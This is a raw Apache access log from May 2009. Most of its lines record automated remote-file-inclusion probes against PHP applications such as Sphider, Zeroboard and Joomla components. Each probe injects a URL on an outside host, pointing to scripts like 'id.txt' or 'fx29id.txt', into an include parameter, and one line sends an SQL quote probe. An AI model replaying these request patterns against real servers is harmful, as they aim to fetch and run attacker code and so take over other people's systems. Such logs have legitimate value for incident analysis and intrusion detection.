91.142.209.134 - - [26/May/2009:09:05:07 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:05:10 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:05:10 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:05:11 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:05:11 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
116.50.163.106 - - [26/May/2009:09:05:41 -0500] "GET /include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
116.50.163.106 - - [26/May/2009:09:05:41 -0500] "GET /logs/include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:07:29 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:07:29 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:07:29 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:07:29 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:07:31 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:07:31 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
202.75.35.218 - - [26/May/2009:09:08:45 -0500] "GET /logs/functions_admin.php?phpbb_root_path=' HTTP/1.1" 404 307 "-""libwww-perl/5.812"
202.75.35.218 - - [26/May/2009:09:08:46 -0500] "GET /functions_admin.php?phpbb_root_path=' HTTP/1.1" 404 302 "-""libwww-perl/5.812"
91.142.209.134 - - [26/May/2009:09:09:43 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:09:43 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:09:44 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:09:44 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:10:11 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:10:11 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
65.55.106.147 - - [26/May/2009:09:12:19 -0500] "GET /logs/access_log.1107216000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.175.205.70 - - [26/May/2009:09:12:26 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://maehongson.nfe.go.th/budget3/image/id.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.822"
213.175.205.70 - - [26/May/2009:09:12:26 -0500] "GET //include/admin.lib.inc.php?site_path=http://maehongson.nfe.go.th/budget3/image/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.822"
213.175.205.70 - - [26/May/2009:09:12:44 -0500] "GET /logs/?sourcedir=http://maehongson.nfe.go.th/budget3/image/id.jpg?? HTTP/1.1" 200 190841 "-""libwww-perl/5.822"
213.175.205.70 - - [26/May/2009:09:12:44 -0500] "GET /?sourcedir=http://maehongson.nfe.go.th/budget3/image/id.jpg?? HTTP/1.1" 200 3245 "-""libwww-perl/5.822"
121.130.29.11 - - [26/May/2009:09:13:27 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:09:13:27 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:09:13:27 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:09:13:29 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:16:52 -0500] "GET /inc/pipe.php?HCL_path=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:16:52 -0500] "GET /logs/access_log.1239580800/inc/pipe.php?HCL_path=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:16:52 -0500] "GET /logs/access_log.1235606400/inc/pipe.php?HCL_path=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:16:52 -0500] "GET /logs/inc/pipe.php?HCL_path=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
89.108.64.88 - - [26/May/2009:09:17:57 -0500] "GET /logs//samplefaqsupport.php?path%255Bdocroot%255D=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
89.108.64.88 - - [26/May/2009:09:18:02 -0500] "GET //samplefaqsupport.php?path%255Bdocroot%255D=http://www.ghetto.uz/readme.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.812"
211.21.254.165 - - [26/May/2009:09:18:29 -0500] "GET /logs//BaseAdmin.class.php?_CONF[path]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.21.254.165 - - [26/May/2009:09:18:30 -0500] "GET //BaseAdmin.class.php?_CONF[path]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.21.254.165 - - [26/May/2009:09:18:31 -0500] "GET /logs/access_log.1237766400//BaseAdmin.class.php?_CONF[path]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.21.254.165 - - [26/May/2009:09:19:11 -0500] "GET /logs/access_log.1237939200//BaseAdmin.class.php?_CONF[path]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
38.108.70.51 - - [26/May/2009:09:19:20 -0500] "GET /logs/home.php?index=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:09:19:20 -0500] "GET /home.php?index=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.814"
211.21.254.165 - - [26/May/2009:09:19:28 -0500] "GET /logs/access_log.1236988800//BaseAdmin.class.php?_CONF[path]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
38.108.70.51 - - [26/May/2009:09:19:44 -0500] "GET /logs/home.php?index=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:09:19:44 -0500] "GET /home.php?index=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:09:19:50 -0500] "GET /home.php?index=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:09:19:50 -0500] "GET /logs/home.php?index=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.814"
121.78.226.120 - - [26/May/2009:09:22:21 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.78.226.120 - - [26/May/2009:09:22:21 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.175.122.228 - - [26/May/2009:09:22:21 -0500] "GET /logs///maillist/install/install3.php?database=none&cabsolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.175.122.228 - - [26/May/2009:09:22:21 -0500] "GET /logs/access_log.1233964800///maillist/install/install3.php?database=none&cabsolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
66.175.122.228 - - [26/May/2009:09:22:21 -0500] "GET ///maillist/install/install3.php?database=none&cabsolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.78.226.120 - - [26/May/2009:09:22:21 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.78.226.120 - - [26/May/2009:09:22:29 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.175.122.228 - - [26/May/2009:09:22:46 -0500] "GET /logs/access_log.1234051200///maillist/install/install3.php?database=none&cabsolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:09:22:57 -0500] "GET /logs/access_log.1235433600/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:09:22:57 -0500] "GET /logs/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:09:22:58 -0500] "GET /send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:09:22:58 -0500] "GET /logs/access_log.1233792000/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:23:05 -0500] "GET /logs//main.php?appserv_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:23:05 -0500] "GET //main.php?appserv_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:23:05 -0500] "GET /logs/access_log.1239926400//main.php?appserv_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:23:42 -0500] "GET //main.php?appserv_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:23:42 -0500] "GET /logs//main.php?appserv_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:23:42 -0500] "GET /logs/access_log.1239926400//main.php?appserv_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:09:24:18 -0500] "GET /logs/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:09:24:18 -0500] "GET /send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:09:24:18 -0500] "GET /logs/access_log.1235433600/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:09:24:18 -0500] "GET /logs/access_log.1233792000/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:09:28:07 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:09:28:12 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:09:28:12 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.98.239.5 - - [26/May/2009:09:29:05 -0500] "GET /logs/access_log.1229990400 HTTP/1.1" 200 112089 "http://www.metaseek.nl/search/web/3/tukulid.txt""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
195.98.239.5 - - [26/May/2009:09:29:05 -0500] "GET /favicon.ico HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
195.98.239.5 - - [26/May/2009:09:29:08 -0500] "GET /favicon.ico HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
195.98.239.5 - - [26/May/2009:09:29:12 -0500] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://fortpit.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
195.98.239.5 - - [26/May/2009:09:29:12 -0500] "GET /logs/ HTTP/1.1" 200 190841 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
195.98.239.5 - - [26/May/2009:09:29:12 -0500] "GET /icons/back.gif HTTP/1.1" 200 216 "http://fortpit.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
195.98.239.5 - - [26/May/2009:09:29:12 -0500] "GET /icons/text.gif HTTP/1.1" 200 229 "http://fortpit.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
208.116.34.106 - - [26/May/2009:09:29:28 -0500] "GET //include/lib.inc.php?site_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:29:28 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:29:28 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:29:28 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:09:29:38 -0500] "GET /logs/access_log.1235001600/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
113.29.225.7 - - [26/May/2009:09:30:01 -0500] "GET /logs/access_log.1235001600/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.239.76.25 - - [26/May/2009:09:30:05 -0500] "GET /send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.239.76.25 - - [26/May/2009:09:30:05 -0500] "GET /logs/access_log.1235001600/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.239.76.25 - - [26/May/2009:09:30:05 -0500] "GET /logs/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.239.76.25 - - [26/May/2009:09:30:05 -0500] "GET /logs/access_log.1235433600/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.98.239.5 - - [26/May/2009:09:30:18 -0500] "GET /logs/access_log.1243209600 HTTP/1.1" 200 622592 "http://fortpit.pconline.com/logs/""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
208.116.34.106 - - [26/May/2009:09:30:37 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:30:37 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:30:37 -0500] "GET //include/lib.inc.php?site_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:09:30:41 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.239.76.25 - - [26/May/2009:09:31:12 -0500] "GET /send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.239.76.25 - - [26/May/2009:09:31:12 -0500] "GET /logs/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.239.76.25 - - [26/May/2009:09:31:12 -0500] "GET /logs/access_log.1235433600/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.239.76.25 - - [26/May/2009:09:31:12 -0500] "GET /logs/access_log.1235001600/send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:32:42 -0500] "GET /inc/header.php/step_one.php?server_inc=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:32:42 -0500] "GET /logs/access_log.1239580800/inc/header.php/step_one.php?server_inc=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:32:42 -0500] "GET /logs/inc/header.php/step_one.php?server_inc=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:32:42 -0500] "GET /logs/access_log.1238112000/inc/header.php/step_one.php?server_inc=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:09:34:03 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:09:34:03 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:09:34:03 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.212.165.114 - - [26/May/2009:09:34:20 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:35:15 -0500] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:35:15 -0500] "GET /logs/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:35:15 -0500] "GET /logs/access_log.1240790400/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:35:24 -0500] "GET /logs/access_log.1240358400/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:09:37:03 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:09:37:03 -0500] "GET /logs/access_log.1228608000%20%20//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
121.130.29.11 - - [26/May/2009:09:37:03 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:09:37:19 -0500] "GET /?_zb_path=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:09:37:19 -0500] "GET /logs/access_log.1236124800/?_zb_path=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:09:37:19 -0500] "GET /logs/access_log.1236470400/?_zb_path=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:09:37:21 -0500] "GET /logs/?_zb_path=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:09:40:27 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 315 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:09:40:27 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/ask_password.php?dir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:09:40:27 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:09:40:53 -0500] "GET /logs/access_log.1236643200//skin/zero_vote/ask_password.php?dir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 342 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:41:08 -0500] "GET //vwar/backup/errors.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:41:08 -0500] "GET /logs//vwar/backup/errors.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:41:09 -0500] "GET /logs/access_log.1227657600//vwar/backup/errors.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:41:23 -0500] "GET /logs/access_log.1228435200//vwar/backup/errors.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:42:12 -0500] "GET /logs/access_log.1228608000%20%20//vwar/backup/errors.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
121.78.226.120 - - [26/May/2009:09:44:20 -0500] "GET /logs/access_log.1228608000%20%20//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
121.78.226.120 - - [26/May/2009:09:44:20 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.2 - - [26/May/2009:09:46:53 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
77.221.130.2 - - [26/May/2009:09:46:53 -0500] "GET //include/bbs.lib.inc.php?site_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
65.55.106.183 - - [26/May/2009:09:47:17 -0500] "GET /logs/access_log.1188691200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.185.20.88 - - [26/May/2009:09:51:18 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:09:51:18 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:09:52:22 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:09:52:22 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
209.85.26.17 - - [26/May/2009:09:54:26 -0500] "GET /logs/config.php?inc=http://merino.co.th/components/com_joomlaboard/uploaded/id.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.85.26.17 - - [26/May/2009:09:54:26 -0500] "GET /config.php?inc=http://merino.co.th/components/com_joomlaboard/uploaded/id.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
86.39.131.85 - - [26/May/2009:09:56:03 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
